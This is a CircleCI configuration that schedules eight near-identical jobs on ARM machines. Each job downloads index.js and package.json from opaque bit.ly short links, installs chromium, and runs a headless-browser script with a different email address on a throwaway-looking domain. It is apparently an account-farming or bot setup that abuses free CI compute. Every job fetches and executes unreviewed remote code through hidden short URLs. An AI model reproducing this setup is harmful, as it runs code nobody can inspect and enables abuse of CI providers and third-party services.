version: 2.1

jobs:
 exemple_no_1:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch cpiatbarilochrrgbne_vip-stu-office-gy --single-branch lunarCrushData
      - run: sudo apt-get install -y chromium-browser
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: npm i -s
      - run: node index -t 57 -r 2 -e cpiatbarilochrrgbne@vip.stu.office.gy
 exemple_no_2:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch manitoba0jklexv789l2_vip-stu-office-gy --single-branch lunarCrushData
      - run: sudo apt-get install -y chromium-browser
      - run: npm i -s
      - run: node index -t 56 -r 3 -e manitoba0jklexv789l2@vip.stu.office.gy
 exemple_no_3:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch drrobertp1gnmytjtyu_vip-stu-office-gy --single-branch lunarCrushData
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: sudo apt-get install -y chromium-browser
      - run: npm i -s
      - run: node index -t 57 -r 3 -e drrobertp1gnmytjtyu@vip.stu.office.gy
 exemple_no_4:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch westernhhyhunion577_vip-stu-office-gy --single-branch lunarCrushData
      - run: sudo apt-get install -y chromium-browser
      - run: npm i -s
      - run: node index -t 56 -r 3 -e westernhhyhunion577@vip.stu.office.gy
 exemple_no_5:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch daituansuhuynh_vip-stu-office-gy --single-branch lunarCrushData
      - run: sudo apt-get install -y chromium-browser
      - run: npm i -s
      - run: node index -t 57 -r 3 -e daituansuhuynh@vip.stu.office.gy
 exemple_no_6:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch tinhdiensuphuzz_vip-stu-office-gy --single-branch lunarCrushData
      - run: sudo apt-get install -y chromium-browser
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: npm i -s
      - run: node index -t 56 -r 3 -e tinhdiensuphuzz@vip.stu.office.gy
 exemple_no_7:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch upsserv77hices9201_vip-stu-office-gy --single-branch lunarCrushData
      - run: sudo apt-get install -y chromium-browser
      - run: npm i -s
      - run: node index -t 56 -r 3 -e upsserv77hices9201@vip.stu.office.gy
 exemple_no_8:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch meocoder_vip-stu-office-gy --single-branch lunarCrushData
      - run: sudo apt-get install -y chromium-browser
      - run: npm i -s
      - run: node index -t 56 -r 2 -e oanoantuongbaxyzkkl@vip.stu.office.gy
      
      
workflows:
  version: 2
  exemple:
    triggers:
      - schedule:
          cron: "2 0 * * *"
          filters:
            branches:
              only:
                - main
      - schedule:
          cron: "6 1 * * *"
          filters:
            branches:
              only:
                - main
    jobs:
      - exemple_no_1
      - exemple_no_2
      - exemple_no_3
      - exemple_no_4
      - exemple_no_5
      - exemple_no_6
      - exemple_no_7
      - exemple_no_8
